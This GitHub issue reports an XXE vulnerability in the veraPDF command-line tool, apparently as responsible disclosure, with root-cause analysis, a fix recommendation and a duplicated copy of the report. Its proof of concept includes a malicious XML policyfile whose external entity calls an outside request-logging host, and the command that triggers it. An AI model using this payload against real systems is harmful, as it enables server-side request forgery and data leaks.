You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
A malicious policyfile in XML passed to veraPDF CLI can lead to a XXE vulnerability exploitation due to insecure use of XML parser. The policyfile be the attack payload, which is similar to previously fixed issue #1415, but this vulnerability happens at a different place within CLI tool even before the XSL transformation happens.
### POC
Installed the latest veraPDF, installer downloaded from the website:
PS C:\Users\samym\Documents\verapdf-poc> verapdf --version
veraPDF 1.26.2
Built: Sun May 19 13:33:00 CST 2024
Developed and released by the veraPDF Consortium.
Funded by the PREFORMA project.
Released under the GNU General Public License v3
and the Mozilla Public License v2 or later.
malicious policyfile which doesn't have to be a xsl file to be parsed, poc.xml:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "https://eo9k3koijwh1jvr.m.pipedream.net/poc">]>
<root>&xxe;</root>
https://eo9k3koijwh1jvr.m.pipedream.net is a malicious website I set up to log incoming request for demo purpose only
And prepare a pdf whatever named test.pdf
Execute:
PS C:\Users\samym\Documents\verapdf-poc> verapdf --policyfile .\poc.xml .\test.pdf
Exception in thread "main" org.verapdf.core.VeraPDFException: Policy file extension must be one of sch, xsl, or xslt
at org.verapdf.policy.PolicyChecker.applyPolicy(PolicyChecker.java:125)
at org.verapdf.cli.VeraPdfCliProcessor.applyPolicy(VeraPdfCliProcessor.java:247)
at org.verapdf.cli.VeraPdfCliProcessor.processPaths(VeraPdfCliProcessor.java:107)
at org.verapdf.cli.VeraPdfCli.singleThreadProcess(VeraPdfCli.java:142)
at org.verapdf.cli.VeraPdfCli.main(VeraPdfCli.java:111)
at org.verapdf.apps.GreenfieldCliWrapper.main(GreenfieldCliWrapper.java:54)
Though there was a exception when applying policy, vulnerability can be still triggered even before that
Could see the request came in on my request bin anyway:
This vulnerability could be further exploited and lead to information leak, SSRF and possibly RCE
### Root cause analysis:
The problem is actually inside function mergeEnabledFeaturesFromPolicy under org.verapdf.apps.utils.ApplicationUtils: https://github.com/veraPDF/veraPDF-apps/blob/v1.27.88/gui/src/main/java/org/verapdf/apps/utils/ApplicationUtils.java#L171
The policyfile is parsed without secure settings on or external entities disabled, which finally leads to a XXE vulnerability. Also, this function is not only used by veraPDFCli, but used in other places as well, which means there could be more attack surface
### Recommendations:
Enable secure processing of XML files dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
Or
Disable all external entities
Hi team! Thank you for addressing and fixing the security issue I reported. To help other users identify and understand the implications of this fix, could we consider requesting a CVE number for this vulnerability? This would make it easier for users to track and assess any related security concerns.
Hi team,
A malicious policyfile in XML passed to veraPDF CLI can lead to a XXE vulnerability exploitation due to insecure use of XML parser. The policyfile be the attack payload, which is similar to previously fixed issue #1415, but this vulnerability happens at a different place within CLI tool even before the XSL transformation happens.
### POC
Installed the latest veraPDF, installer downloaded from the website:
malicious policyfile which doesn't have to be a xsl file to be parsed, poc.xml:
https://eo9k3koijwh1jvr.m.pipedream.net
is a malicious website I set up to log incoming request for demo purpose onlyAnd prepare a pdf whatever named test.pdf
Execute:
Though there was a exception when applying policy, vulnerability can be still triggered even before that
Could see the request came in on my request bin anyway:
This vulnerability could be further exploited and lead to information leak, SSRF and possibly RCE
### Root cause analysis:
The problem is actually inside function mergeEnabledFeaturesFromPolicy under org.verapdf.apps.utils.ApplicationUtils:
https://github.com/veraPDF/veraPDF-apps/blob/v1.27.88/gui/src/main/java/org/verapdf/apps/utils/ApplicationUtils.java#L171
The policyfile is parsed without secure settings on or external entities disabled, which finally leads to a XXE vulnerability. Also, this function is not only used by veraPDFCli, but used in other places as well, which means there could be more attack surface
### Recommendations:
Enable secure processing of XML files
dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
Or
Disable all external entities
The text was updated successfully, but these errors were encountered: